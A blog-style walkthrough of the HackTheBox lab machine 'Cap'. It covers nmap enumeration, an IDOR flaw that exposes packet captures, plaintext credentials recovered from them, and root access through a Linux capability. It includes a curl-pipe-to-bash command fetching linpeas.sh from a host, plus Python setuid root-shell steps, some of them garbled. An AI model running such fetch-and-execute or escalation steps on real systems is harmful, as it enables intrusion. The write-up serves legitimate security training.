HackTheBox machine "Cap"

HackTheBox machine "Cap"

Description

The machine "Cap" is a Linux-based system classified as easy difficulty. It hosts an HTTP server designed for administrative tasks, one of which includes network capture functionality. However, weak security controls lead to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability allows an unauthorized user to access network captures belonging to other users. Upon analyzing the capture file, plaintext credentials are discovered, enabling the attacker to gain an initial foothold on the system. To escalate privileges and gain root access, a specific Linux capability is exploited, which further highlights the misconfigurations present in the system.


??Skills Required

  1. web enumeration
  2. Packet Capture Analysis

??Skills Learned

  1. IDOR
  2. Exploit Linux Capabilites

Analysis

Step:-1 This nmap command is to run a scan on the 10.129.17.215 IP address and includes the following options:

-Pn: Bypass the ping scan and do port scanning directly, assuming all hosts are live.

-sC: Run the default scripts, which are standard security tests and other common scripts by nmap.

-sV: Do service version scanning, which will reveal which services and their versions are running on which ports.


Step:-2 FTP (File transfer Protocol)

Let's check if FTP allows anonymous access .

The login attempt fails, indicating that anonymous access is disabled. Let's shift our focus to the HTTP server and explore it next.

Step:-3 HTTP (Hyper text Transfer protocol)

Nmap shows that port 80 is running Gunicorn, a Python-based HTTP server. When we visit the page, it loads a dashboard.


Browsing to the IP Config page reveals the output of ifconfig


Similarly, the Network Status page reveals the output for netstat . This suggests that the application is executing system commands. Clicking on the Security Snapshot menu item pauses the page for a few seconds and returns a page as shown below.

Step:-4 There was some data in the /data/0 lets download the pcap and analyze it using the wireshark.


Step:-5 The traffic is not encrypted, allowing us to retrieve the user credentials i.e. nathan / Buck3tH4TF0RM3! . These are found to be valid not only for FTP but can be used to login via SSH.

Step:-6 Privilege Escalation

From our shell on Cap, we can fetch linpeas.sh with curl and pipe the output directly into bash to execute it

curl https://10.10.14.24/linpeas.sh | bash        

The following Python commands will result in a root shell: curl https://10.10.14.24/linpeas.sh | bash

  1. os.setuid()
  2. import os os.setuid(0)
  3. os.system("/bin/bash")

It calls which is used to modify the process user identifier (UID).

Thankyou for visting


Samuel isenin

Cybersecurity | Soc Analyst | Penetration Test | Ethical Hacking | Python Dev | Web3 |Blockchian | Financial Analyst | Linux System

6 个月

Great work

赞
回复
Sujeet Bharti

C ||Java ||Python || DSA ll HTML || CSS ||Networking || Cybersecurity enthusiasm

6 个月

Very helpful!

赞
回复

要查看或添加评论,请登录

Dharmendra Kumar的更多文章

  • DVWA CSRF REPORT AND ARTICLE

    DVWA CSRF REPORT AND ARTICLE

    Vulnerability Name: Cross Site Request Forgery Affected Vendor: DVWA Affected Product Name:…

  • HacktheBox machine "Crocodile"

    HacktheBox machine "Crocodile"

    Description The exploitation vector leverages weak access control and misconfigurations across two services: an FTP…

  • HacktheBox machine "Sequel"

    HacktheBox machine "Sequel"

    Description Databases store critical information, such as usernames, passwords, and other sensitive data, making them a…

  • HackTheBox machine "Appointment"

    HackTheBox machine "Appointment"

    Description Appointment is a web-application-oriented box focused on SQL Injection. The target is a website with a…

    1 条评论
  • HacktheBox "machine" Redeemer

    HacktheBox "machine" Redeemer

    Description In this lab, we explore Redis, a high-performance in-memory database, typically used for caching frequently…

  • HacktheBox "machine" Dancing

    HacktheBox "machine" Dancing

    Description SMB (Server Message Block) is a network protocol primarily used for sharing files, printers, and other…

  • HacktheBox "machine" Fawn

    HacktheBox "machine" Fawn

    Description The File Transfer Protocol (FTP) is widely used for transferring files between clients and servers, but it…

  • HacktheBox "machine" Meow

    HacktheBox "machine" Meow

    Description Enumeration is a crucial initial step in penetration testing, where information about a target system is…

    1 条评论
  • PortSwigger Cross-site scripting Lab-7

    PortSwigger Cross-site scripting Lab-7

    Description Reflected Cross-Site Scripting (XSS) occurs when an attacker injects malicious scripts into web pages that…

    2 条评论
  • PortSwigger Cross-site scripting Lab-6

    PortSwigger Cross-site scripting Lab-6

    Description This lab features a DOM-based cross-site scripting (XSS) vulnerability on the homepage. It utilizes…

社区洞察

其他会员也浏览了